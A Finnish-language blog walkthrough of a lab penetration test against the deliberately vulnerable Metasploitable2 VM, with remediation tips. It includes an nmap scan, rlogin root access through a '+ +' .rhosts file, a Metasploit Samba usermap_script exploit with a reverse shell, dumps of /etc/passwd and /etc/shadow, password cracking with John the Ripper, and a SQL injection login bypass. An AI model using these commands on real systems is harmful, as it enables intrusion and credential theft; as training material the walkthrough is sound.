Metasploitable2

Penetraatiotestaus

Penetraatiotestaus on eettisten tietomurtojen tekemistä, jolla pyritään selvittämään järjestelmän tai palvelun haavoittuvuuksia.

Kali-Linux

Debian pohjainen Linux distribuutio, jonka on kehittänyt Offensive Security. Tarkoitettu penetraatiotestaukseen ja turvallisuusvalvontaan.

Kali-Linuxin virtualbox imagen voi ladata täältä: https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/ 

Metasploitable2

Metasploitable on Offensive Securityn VM, joka on tarkoituksella tehty haavoittuvaksi. Se on luotu penetraatiotestauksen harjoitteluun. Metasploitable on luotu, sillä oman pentestaus labran konfiguroiminen voi olla haastavaa.

Metasploitablen voi ladata täältä: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Metasploitablea ei tule päästää epäluotettavaan verkkoon, vaan tulisi käyttää NAT tai Host-only verkkoa.

VirtualBox

Luodaan NAT ja host-only network navigoimalla virtualboxing preferences -> Network -> NAT networks  ja klikataan add new NAT network. Tehdään sama myös Host-only Networksille.

nat_network

Kali-Linux asennus:

Valitaan File -> Import

Etsitään virtualbox VM tiedosto jonka olet ladannut ja painetaan next.

Seuraavassa ruudussa valitaan että generoidaan uudet MAC osoitteet verkkokorteille, virheiden välttämiseksi.

Tämän jälkeen VirtualBoxin pitäisi alkaa tuomaan VM-konetta.

kali_import.png

Kun tämä on valmis mennään VM:n asetuksiin.

Poistetaan valinta kohdasta USB -> Enable USB Controller, jotta VM käynnistyy.

kali_usb.png

Asetetaan Kali-Linuxille 2 Network adapteria, johon toiseen valitsemme NAT, jotta pystymme ottamaan verkkoon yhteyden.

Toiseen Host-only Adapter, jotta pystymme ottamaan kohdekoneeseen yhteyden.

kali_networkadapter_2kali_network_adapter_1

Tämän jälkeen käynnistetään VM.

kali_login.PNG

Käyttäjä ja salasana on root:toor

Metasploitable asennus:

Klikataan virtualboxista new

Asetukset valitaan Linux

Muistiksi riittää 512MB

metasploitable settings_LI

Klikataan Use existing virtual hard disk file ja haetaan metasploitable.vmdk kansiosta mihin olet sen purkanut.

metasploitablefolder.png

Kun käynnistin metasploitablen ensimmäistä kertaa sain virheilmoituksen

Target filesystem doesn’t have /sbin/init

metasploitable error.png

Mutta tämä korjaantui itsekseen uudelleenkäynnistäessä.

msf.PNG

Tunnus ja salasana koneeseen on msfadmin:msfadmin

Porttiskannaus

Ohjeita katsottu osoitteesta https://tehaurum.wordpress.com/2015/06/13/metasploitable-walkthrough-an-exploitation-guide/

Suoritetaan Nmap:lla porttiskannaus.

nmap -sV -O 192.168.56.101 -p1-65535

-sV parametrillä saamme tulostettua palveluiden nimiä ja versioita
-O parametri fingerprinttaa ja tulostaa tietoa käyttöjärjestelmästä
-p1-65535 portit mitkä halutaan skannata

root@kali:~# nmap -sV -O 192.168.56.101 -p1-65535

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-16 13:43 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00088s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
46191/tcp open status 1 (RPC #100024)
55367/tcp open nlockmgr 1-4 (RPC #100021)
56649/tcp open mountd 1-3 (RPC #100005)
58508/tcp open unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.40%E=4%D=5/16%OT=21%CT=1%CU=41974%PV=Y%DS=2%DC=I%G=Y%TM=591B3AD
OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=11%GCD=FA00%ISR=9C%TI=I%CI=I%TS=U)OPS(O1=
OS:M5B4%O2=M5B4%O3=M5B4%O4=M5B4%O5=M5B4%O6=M5B4)WIN(W1=FFFF%W2=FFFF%W3=FFFF
OS:%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=N%T=41%W=FFFF%O=M5B4%CC=N%Q=)T1(R=Y%
OS:DF=N%T=41%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=100%W=0%S=Z%A=S%F=AR%O=%RD
OS:=0%Q=)T3(R=Y%DF=N%T=100%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T4(R=Y%DF=N%T=100%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=100%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=Y%DF=N%T=100%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=100%W=0%S=Z%
OS:A=S%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=33%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=N)

Network Distance: 2 hops
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.36 seconds

remote shell

Tämän haavoittuvuuden löytämiseksi katsoin ohjeita osoitteesta: https://community.rapid7.com/docs/DOC-1875

Remote shell palvelut pyörivät porteissa 512, 513, 514 ja ne ovat kohde koneella konfiguroitu väärin. Eli kyseinen palvelu sallii etäyhteydet kaikilta hosteilta.

Tätä pääsemme hyväksikäyttämään asentamalla Kali-Linuxille rsh-client palvelun ja ottamalla yhteyden metasploitableen.

root@kali:~# sudo apt-get install rsh-client

root@kali:~# rlogin -l root 192.168.56.101
Last login: Tue May 16 13:35:24 EDT 2017 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#

Joku on siis luonut .rhosts tiedoston jonka sisältönä

+ +

Tämä sallii yhteydet kaikilta käyttäjiltä kaikista hosteista.

Lisätietoa .rhosts filestä https://docs.oracle.com/cd/E19455-01/805-7229/remotehowtoaccess-3/

Tämän korjataksemme meidän pitää poistaa .rhosts tiedostot.

Etsitään tiedostot koneesta

sudo find / -name .rhosts

Tuloksena saamme kansiot

/home/msfadmin/.rhosts

/root/.rhosts

Poistetaan .rhosts tiedostot

sudo rm /home/msfadmin/.rhosts
sudo rm /root/.rhosts

Tämän jälkeen kun yritämme rloginia Kali-Linuxilta sen pitäisi kysyä salasanaa

rlogin_fixed.png

Samba

Toinen tapa päästä koneelle käsiksi on käyttää hyväksi portissa 139/tcp pyörivää samba serviceä ja käyttämälää samba versio 3.0.20 -> 3.0.25rc3 löytyvää haavoittuvuutta, joka sallii hyökkääjän suorittaa komentoja koneelta ilman autentikointia.

Tämä exploit hyödyntää jos /etc/samba/smb.conf tiedostoon ollaan määritelty muu kuin oletus ”username map script”

Lisätietoa Samba palvelusta https://www.samba.org/samba/what_is_samba.html

Lisätietoa haavoittuvuudesta: https://www.samba.org/samba/security/CVE-2007-2447.html

Ohjeita tähän exploittiin: https://www.youtube.com/watch?v=EnwZa5AVJ30

Avataan metasploit

root@kali:~# msfconsole

etsitään samba exploittia

msf > search samba

search_samba

msf > use exploit/multi/samba/usermap_script

msf > info

msf > show options

show_options_samba

Vaihdetaan RHOST kohdekoneeksi (metasploitable)

msf exploit(usermap_script) > set RHOST 192.168.56.101
RHOST => 192.168.56.101

Tämän jälkeen etsitään payloadeja

msf > show payloads

valitaan

cmd/unix/reverse

msf exploit(usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf > show options

lhost

Asetetaan lhost kohtaan lähde koneen ip(Kali-Linux)

msf exploit(usermap_script) > set lhost 192.168.56.102
lhost => 192.168.56.102

Suoritetaan scripti

msf exploit(usermap_script) > run

Niinkuin alla olevasta kuvasta näkyy meillä on root shell access metasploitable koneelle.

samba exploit.png

Pystymme korjaamaan tämän exploitin päivittämällä samba palvelun uuteen versioon tai poistamalla custom määrityksen smb.conf tiedostosta.

Salasanojen haku

Ohjeita salasanojen hakuun ja purkamiseen: https://youtu.be/0fbBwGAuINw?t=3997

Nyt kun meillä on root shell access pystymme suorittamaan komentoja kohdekoneelta ja hakemaan esimerkiksi tietoa käyttäjistä komennolla

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false

Tästä saamme tietoon esimerkiksi

  • Käyttäjänimet
  • Salasanat (jos x se on encryptattu /etc/shadow tiedostossa)
  • User ID (UID)
  • Group ID (GID)
  • User ID info(lisätietoa käyttäjästä esim etunimet, yms.)
  • Kotihakemisto
  • Command/shell

Lisätietoa /etc/passwd tiedostosta: https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/

Seuraavaksi voimme hakea encryptatut salasanat.

cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::

Tiedostoon tallentuu

  •  Käyttäjänimet
  • salasanat (salasanasuojaukset)
  • Viimeinen salasanan vaihto
  • Minimi (kuinka monta päivää ennenkuin käyttäjä saa vaihtaa salasanan)
  • Maksimi (kuinka monta päivää ennenkuin käyttäjän pitää vaihtaa salasana)
  • Varoitus (kuinka monta päivää ennenkuin salasana vanhenee sen jälkeen kun käyttäjää pyydetty vaihtamaan salasana)
  • toimeton (kuinka monta päivää sen jälkeen kun salasana on vanhentunut ennenkuin käyttäjä lukitaan)
  • Vanhentunut (kuinka monta päivää käyttäjä on ollut poistettuna käytöstä)

Lisätietoa /etc/shadow tiedostosta: https://www.cyberciti.biz/faq/understanding-etcshadow-file/

Salasanasuojausten purkaminen

Nyt kun meillä on passwd ja shadow tiedosto voimme yrittää purkaa salasanasuojauksia.

Tämän tekemiseen käytän John the Ripper ohjelmaa joka tulee mukana Kali-Linuxissa. Lisätietoa John the Ripperistä: http://www.openwall.com/john/doc/

Aloitetaan tämä yhdistämällä passwd ja shadow tiedosto ja käyttäjät toisiinsa.

root@kali:~# unshadow /root/passwd /root/shadow > /root/unshadowed.txt

ja lopuksi tallennetaan se tiedostoon unshadowed.txt

root@kali:~# cat unshadowed.txt
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:!:100:101::/var/lib/libuuid:/bin/sh
dhcp:*:101:102::/nonexistent:/bin/false
syslog:*:102:103::/home/syslog:/bin/false
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
sshd:*:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:*:105:113::/var/cache/bind:/bin/false
postfix:*:106:115::/var/spool/postfix:/bin/false
ftp:*:107:65534::/home/ftp:/bin/false
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:!:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:*:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:*:111:65534::/:/bin/false
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
telnetd:*:112:120::/nonexistent:/bin/false
proftpd:!:113:65534::/var/run/proftpd:/bin/false
statd:*:114:65534::/var/lib/nfs:/bin/false
snmp:*:115:65534::/var/lib/snmp:/bin/false

Nyt voimme suorittaa salasuojauksien purkamisen.

root@kali:~# john /root/unshadowed.txt
Created directory: /root/.john
Warning: detected hash type ”md5crypt”, but the string is also recognized as ”aix-smd5”
Use the ”–format=aix-smd5” option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4×3])
Press ’q’ or Ctrl-C to abort, almost any other key for status
postgres (postgres)
user (user)
msfadmin (msfadmin)
service (service)
123456789 (klog)
batman (sys)
6g 0:00:01:58 3/3 0.05070g/s 28702p/s 28703c/s 28703C/s ng343..ng3bg
Use the ”–show” option to display all of the cracked passwords reliably
Session aborted

Voimme vieltä rakastella purettuja salasanoja komennolla

root@kali:~# john –show /root/unshadowed.txt
sys:batman:3:3:sys:/dev:/bin/sh
klog:123456789:103:104::/home/klog:/bin/false
msfadmin:msfadmin:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:postgres:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:user:1001:1001:just a user,111,,:/home/user:/bin/bash
service:service:1002:1002:,,,:/home/service:/bin/bash

6 password hashes cracked, 1 left

Nyt meillä on tiedossa 6:n erikäyttäjän salasanat, joista esimerkiksi msfadmin tunnuksella on sudo oikeudet.

Näiden salasanojen purkamiseen meni aikaa vain muutama sekunti.

Salasanasuojauksen purulta pystytään välttymään käyttämällä vahvoja salasanoja.

Web palvelut

Kohdekoneelle asennettuja web palveluita pääsemme tarkastelemaan syöttämällä selaimeen kohdekoneen ip-osoitteen.

webservices

Ensimmäinen turvallisuus riski löytyi niinkin helposti kuin menemällä /phpinfo.php osoitteeseen. phpinfo.php sisältää tietoa php-konfiguraatiosta.

yleisesti phpinfo.php kannattaa piilottaa ulkopuolisilta käyttäjiltä esim piilottamalla sen salasanan taakse.

Mutillidae

Mutillidae on sovellus joka sisältää tarkoituksella haavoittuvaksi tehtyjä PHP skriptejä.

Aluksi Mutillidae ei toiminut haluamalla tavalla koska mutillidaen konfiguroinnissa oli dbname väärin joten täytyi mennä tekemään pieni muutos.

Navigoidaan metasploitablessa

/var/www/mutillidae/

sudoedit config.inc

dbname =

mutillidae

Ensimmäinen haavoittuvuus jota voimme testat löytyy login/register sivun lomakkeesta.

Syöttämällä esimerkiksi yksinkertaisen lainausmerkin (’) saamme tulostettua virhekoodin sivulle

sqlerror

Tästä virheestä saamme selville mitä lausetta login kenttä yrittää suorittaa

SELECT * FROM accounts WHERE username=”” AND password=””

Tähän voimme yrittää yksinkertaista sql injektiota

’ or 1=1 —

Tällä pääsimme kirjautumaan admin käyttäjälle sisään, koska se on ensimmäisenä taulussa ja koska laitamamme skripti tulostaa

SELECT * FROM accounts WHERE username=”’ or 1=1″; — AND password =””;

Tässä tilanteessa SQL siis luulee että kyttäjä on olemassa sillä 1=1 on totta ja jälkemmäinen — AND password=””; on muutettu sql kommentiksi, joten se jätetään huomioimatta.

admin logged in.png

Ohjeita kuinka sql injektioita vastaan voi puolustautua: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

Mainokset

Vastaa

Täytä tietosi alle tai klikkaa kuvaketta kirjautuaksesi sisään:

WordPress.com-logo

Olet kommentoimassa WordPress.com -tilin nimissä. Log Out /  Muuta )

Google+ photo

Olet kommentoimassa Google+ -tilin nimissä. Log Out /  Muuta )

Twitter-kuva

Olet kommentoimassa Twitter -tilin nimissä. Log Out /  Muuta )

Facebook-kuva

Olet kommentoimassa Facebook -tilin nimissä. Log Out /  Muuta )

Muodostetaan yhteyttä palveluun %s